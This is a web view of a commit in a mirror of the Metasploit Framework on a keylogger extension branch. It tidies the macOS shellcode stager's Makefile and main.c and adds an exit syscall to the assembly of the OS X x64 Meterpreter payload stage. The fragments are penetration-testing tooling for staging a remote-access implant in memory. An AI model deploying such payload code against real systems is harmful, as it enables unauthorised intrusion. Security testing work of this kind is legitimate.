infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

more fixes

MS-2855/keylogger-mettle-extension
Tim W 2018-01-30 17:54:10 +08:00
parent 39c07e2289
commit 0ce125ec55
3 changed files with 11 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
external/source/shellcode/osx/stager/Makefile vendored
View File

@ -1,12 +1,6 @@
CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -O0
SDK=`xcrun --sdk iphoneos --show-sdk-path`
GCC_BIN=`xcrun --sdk iphoneos -f gcc`
GCC_BASE=$(GCC_BIN) $(CFLAGS) -Wimplicit -isysroot $(SDK)
GCC=$(GCC_BASE) -arch arm64
SDK_OSX=`xcrun --sdk macosx --show-sdk-path`
CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
GCC_BIN_OSX=`xcrun --sdk macosx -f gcc`
GCC_BASE_OSX=$(GCC_BIN_OSX) -Os $(CFLAGS)
GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS)
GCC_OSX=$(GCC_BASE_OSX) -arch x86_64
all: clean main_osx
@ -21,5 +15,5 @@ shellcode: install
otool -tv main_osx
clean:
rm -f *.o main_ios main_osx
rm -f *.o main_osx

2
external/source/shellcode/osx/stager/main.c vendored
View File

@ -20,7 +20,7 @@
typedef NSObjectFileImageReturnCode (*NSCreateObjectFileImageFromMemory_ptr)(void *address, unsigned long size, NSObjectFileImage *objectFileImage);
typedef NSModule (*NSLinkModule_ptr)(NSObjectFileImage objectFileImage, const char* moduleName, unsigned long options);
uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int dereference);
uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer);
uint64_t find_symbol(uint64_t base, char* symbol);
uint64_t find_entry_offset(struct mach_header_64 *mh);
int string_compare(const char* s1, const char* s2);

9
modules/payloads/stages/osx/x64/meterpreter.rb
View File

@ -101,9 +101,9 @@ module MetasploitModule
; setup stack?
and rsp, -0x10 ; Align
add sp, 0x40 ; Add room for initial stack and prog name
add sp, 0x40 ; Add room for initial stack and prog name
mov rax, 109 ; prog name "m"
push 0 ;
push 0 ;
mov rcx, rsp ; save the stack
push 0
push 0
@ -122,6 +122,11 @@ module MetasploitModule
mov rax, #{entry_offset}
add rsi, rax
call rsi
; exit
mov eax, 0x2000001
mov rdi, 0x1
syscall
)
midstager = Metasm::Shellcode.assemble(Metasm::X64.new, midstager_asm).encode_string
print_status("Transmitting first stager...(#{midstager.length} bytes)")